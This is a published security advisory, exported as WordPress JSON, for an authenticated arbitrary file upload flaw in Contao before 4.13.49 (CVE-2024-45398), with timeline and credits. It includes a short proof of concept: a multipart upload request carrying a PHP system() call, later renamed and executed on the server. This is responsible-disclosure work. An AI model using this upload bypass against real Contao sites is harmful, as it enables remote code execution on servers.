{"id":23603,"date":"2024-10-30T11:06:36","date_gmt":"2024-10-30T10:06:36","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2024-0013\/"},"modified":"2024-11-08T15:55:12","modified_gmt":"2024-11-08T14:55:12","slug":"usd-2024-0013","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2024-0013\/","title":{"rendered":"usd-2024-0013"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.0\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

usd-2024-0013 | Arbitrary File Upload in Contao 4.13<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2024-0013
Product<\/strong>: Contao
Affected Version<\/strong>: < 4.13.49
Vulnerability Type<\/strong>: Unrestricted Upload of File with Dangerous Type (CWE 434)
Security Risk<\/strong>: High CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:L
Vendor URL<\/strong>: https:\/\/contao.org\/<\/a>
Vendor Acknowledged Vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: CVE-2024-45398
CVE Link<\/strong>: CVE-2024-45398<\/a><\/p>\n

Affected Component(s) (optional)<\/h3>\n

Contao File Manager<\/p>\n

Desciption<\/h3>\n

Authenticated users in the backend with access to the file manager can bypass the upload filter to upload arbitrary files and execute them on the server.<\/p>\n

Proof of Concept<\/h3>\n

First, a php file is uploaded with a filename without a dot starting with any letting and ending with an allowed file ending:<\/p>\n

\n
<\/span>POST<\/span> \/contao?act=move&do=files&mode=2&pid=files%2F[...]<\/span> HTTP<\/span>\/<\/span>2<\/span>
Host<\/span>:<\/span> localhost<\/span>
[...]
<\/span>-----------------------------1270547763761186843258108517
Content-Disposition: form-data; name=\"files\"; filename=\"ahtml\"
Content-Type: text\/html<?php  system(\"date\");?>
-----------------------------1270547763761186843258108517--<\/pre>\n<\/div>\n
Then the file is renamed to a php file via the file manager GUI and executed by clicking on the file icon in the file manager.<\/p>\n
Fix<\/h3>\n
Assume all input is malicious. Use an \"accept known good\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.<\/p>\n
References<\/h3>\n
https:\/\/cwe.mitre.org\/data\/definitions\/434.html<\/a>
https:\/\/github.com\/contao\/contao\/security\/advisories\/GHSA-vm6r-j788-hjh5<\/a><\/p>\n
Timeline<\/h3>\n
    \n
  • 2024-08-15:<\/strong> Vulnerability identified by Jakob Steeg.<\/li>\n
  • 2024-09-02:<\/strong> Sent first contact request.<\/li>\n
  • 2024-09-05:<\/strong> Contao reports that a fix is being worked on.<\/li>\n
  • 2024-09-07:<\/strong> Contao published fix in version 4.13.49.<\/li>\n
  • 2024-10-30:<\/strong> This advisory is published.<\/li>\n<\/ul>\n
    Credits<\/h3>\n
    This security vulnerability was identified by Jakob Steeg of usd AG.<\/p>\n
    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"
    usd-2024-0013 | Arbitrary File Upload in Contao 4.13 Advisory ID: usd-2024-0013Product: ContaoAffected Version: < 4.13.49Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE 434)Security Risk: High CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:LVendor URL: https:\/\/contao.org\/Vendor Acknowledged Vulnerability: YesVendor Status: FixedCVE Number: CVE-2024-45398CVE Link: CVE-2024-45398 Affected Component(s) (optional) Contao File Manager Desciption Authenticated users in the backend with access to the […]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-23603","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23603","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=23603"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23603\/revisions"}],"predecessor-version":[{"id":23608,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23603\/revisions\/23608"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=23603"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}